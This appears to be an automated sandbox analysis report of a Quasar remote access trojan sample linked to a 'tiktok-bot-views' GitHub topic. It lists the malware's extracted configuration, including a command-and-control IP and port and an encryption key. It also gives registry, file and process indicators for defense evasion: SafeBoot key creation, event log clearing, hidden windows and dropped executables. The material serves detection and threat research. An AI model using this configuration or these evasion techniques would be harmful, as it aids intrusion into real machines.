Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/08/2024, 10:39
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/topics/tiktok-bot-views
Resource
win10v2004-20240802-en
General
-
Target
https://github.com/topics/tiktok-bot-views
Malware Config
Extracted
quasar
1.0.0.0
v3.0.5 | Jon
54.39.249.57:4782
822aa29d-571b-4709-99b4-8f3b2e9865c2
-
encryption_key
530365ADCE57276D2B3E3E914F6A39E2A2632C4B
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/5872-555-0x000002937EA20000-0x000002937F180000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 6032 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 5 IoCs
pid Process 3472 $sxr-mshta.exe 5796 $sxr-cmd.exe 5872 $sxr-powershell.exe 5772 $sxr-cmd.exe 5764 $sxr-powershell.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RTL8023x64 powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sppsvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\srvnet powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UcmCx0101\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Wcmsvc powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DevQueryBroker\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSS2i_I2C_BXT_P\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PerfNet\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\USBXHCI powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmicvmsession powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpnUserService_28d13 powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AxInstSV\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DeviceAssociationBrokerSvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\exfat powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LSI_SAS2i\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rdyboost\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SgrmBroker\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinMad\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DeviceAssociationBrokerSvc_28d13\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DsmSvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ibbus powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Netlogon powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\npsvctrig\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\amdsbs\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAgileVpn powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SCardSvr\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TokenBroker powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Acx01000\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidserv\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaStorAV powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ntfs\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wcncsvc\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\p2pimsvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SEMgrSvc powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbcir\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BattC powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CDPUserSvc_28d13\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmwappushservice powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\FrameServer\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetbiosSmb powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vhf powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DoSvc\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MozillaMaintenance powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Serenum\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TCPIPTUNNEL powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAuto powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ServiceModelService 3.0.0.0 powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Tcpip6 powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\.NETFramework\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\cnghwassist powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NcaSvc\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetBIOS\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PrintWorkflowUserSvc_28d13\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmicshutdown powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpdUpFltr powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSS2i_I2C\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSSi_GPIO\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\megasr\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nsi powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UdkUserSvc\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetTcpPortSharing powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ramdisk powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasPppoe\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Hide Artifacts: Hidden Window 1 TTPs 3 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 5872 $sxr-powershell.exe 5772 $sxr-cmd.exe 5764 $sxr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 60 camo.githubusercontent.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 14 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1724064083" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 19 Aug 2024 10:41:23 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E0A7E1DA-20C2-4F1E-A55C-26C54D900007}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cd489dd0f71355abe30a4375800d6e9c6fb31a781e9d8416ca093e1af6e26975" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\af97b9ceb8c3cae6ad78ceebdb52cb65dd48bbdc142e23ac2efa4e4b783a0b28" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a321155224f2da01a321155224f2da01a321155224f2da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000135929552000616639376239636562386333636165366164373863656562646235326362363564643438626264633134326532336163326566613465346237383361306232380000b20009000400efbe13592955135929552e000000000000000000000000000000000000000000000000005db98d00610066003900370062003900630065006200380063003300630061006500360061006400370038006300650065006200640062003500320063006200360035006400640034003800620062006400630031003400320065003200330061006300320065006600610034006500340062003700380033006100300062003200380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000fb1c7a161000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61663937623963656238633363616536616437386365656264623532636236356464343862626463313432653233616332656661346534623738336130623238000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000657268716a7679710000000000000000c8d7c3314953e644a4ec9fb3f89bbbe93518079ed650ef1198ccde20cd0d11aac8d7c3314953e644a4ec9fb3f89bbbe93518079ed650ef1198ccde20cd0d11aad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100390034003100330030003000360035002d0033003400370031003200310032003500350036002d0031003600350036003900340037003700320034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9aa8484000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\af97b9ceb8c3cae6ad78ceebdb52cb65dd48bbdc142e23ac2efa4e4b783a0b28" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\NodeSlot = "3" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9b891cd41a286d35a37cb47ab9ead77ad4cc7a1807a9bdb7ac9b64066206cb05" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 